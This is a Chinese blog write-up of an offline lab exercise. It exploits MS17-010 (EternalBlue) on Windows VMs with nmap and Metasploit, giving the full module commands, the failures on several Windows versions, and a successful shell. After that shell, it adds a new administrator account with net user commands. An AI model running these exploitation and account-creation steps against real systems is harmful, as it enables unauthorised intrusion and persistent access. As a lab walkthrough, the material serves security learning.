本次实验为离线靶机测试
VMware 16.0
Version:Linux version 6.1.0-kali5-amd64 (devel@kali.org) (gcc-12 (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1kali2
cat /proc/version
IP:192.168.80.130/24 网关192.168.80.2
Version:Windows 7 旗舰版 [版本 6.1 7601]
systeminfo或者winver
IP:192.168.80.140/24 (后面换了192.168.80.141/24) 网关192.168.80.2
Kali自带metasploit
kali扫描
nmap -sS -O -T4 192.168.80.140
Nessus扫描
运行msfconsole
msfconsole
报错
问一下Chatgpt
这个错误看起来像是Metasploit Framework的一个依赖文件找不到导致的。可能的原因有很多,例如文件损坏、文件权限问题或缺少依赖库等。
以下是一些可能的解决方法:
如果以上方法都不起作用,你可以考虑提交一个issue到Metasploit Framework的GitHub仓库中,向开发人员寻求帮助。
重装Metasploit Framework
sudo apt-get remove metasploit-framework ##卸载旧版
sudo apt-get update ##更新APT包列表
sudo apt-get install metasploit-framework ##重装
如果你想安装特定版本的Metasploit Framework,可以在命令后面添加版本号
sudo apt-get install metasploit-framework=6.1.11-0kali1
msfconsole -v ##检查安装版本
msfconsole ##启动
查找MS17-010漏洞模块
search ms17-010
- 0 exploit/windows/smb/ms17_010_eternalblue:用于利用EternalBlue漏洞实现SMB远程代码执行。
- 1 exploit/windows/smb/ms17_010_psexec:用于利用EternalRomance、EternalSynergy或EternalChampion漏洞实现SMB远程代码执行。
- 2 auxiliary/admin/smb/ms17_010_command:用于利用EternalRomance、EternalSynergy或EternalChampion漏洞实现SMB远程命令执行。
- 3 auxiliary/scanner/smb/smb_ms17_010:用于检测目标是否存在MS17-010漏洞。
- 4 exploit/windows/smb/smb_doublepulsar_rce:用于利用DoublePulsar漏洞实现SMB远程代码执行。
选择检测模块
use 3
查看模块具体信息
info
查看需要设置选项
show options
设置攻击目标IP
set rhosts 192.168.80.140
执行模块攻击检测
run
执行模块攻击
search ms17-010 ##查找漏洞
use 0 ##选择模块
set rhosts 192.168.80.140 ##设置目标IP
run ##攻击
报错:漏洞利用因失败而中止:无目标:此模块仅支持 x64(64 位)目标
永恒之蓝只能在64位系统上运行
更换Windows server 2008 R2 重来
系统不兼容,这个错误通常出现在目标主机的lsass服务崩溃导致SMB协商失败。这可能会导致目标主机在60秒后重新启动。这是由于漏洞利用的性质,可能会导致目标系统崩溃或意外关闭服务。你可以等待目标系统重新启动,然后再次尝试攻击,或者尝试使用其他利用方法或工具进行攻击。另外,确保你正在攻击正确的目标IP地址,并检查你的漏洞利用工具和payload是否与目标系统的架构和操作系统版本兼容。
换了个window server 2012
每次攻击到最后一步Server 2012就蓝屏,试了好多遍,还是蓝屏。。。
再换个重装的win7
成功
shell
chcp 65001 ##设置字符格式
添加新用户和权限
net user 新用户名 密码 /add ##添加新用户
net localgroup administrators 用户名 /add ##添加管理员组权限
远程桌面登录
略
参考博客https://blog.csdn.net/qq_44159028/article/details/104044002
手机扫一扫
移动阅读更方便
你可能感兴趣的文章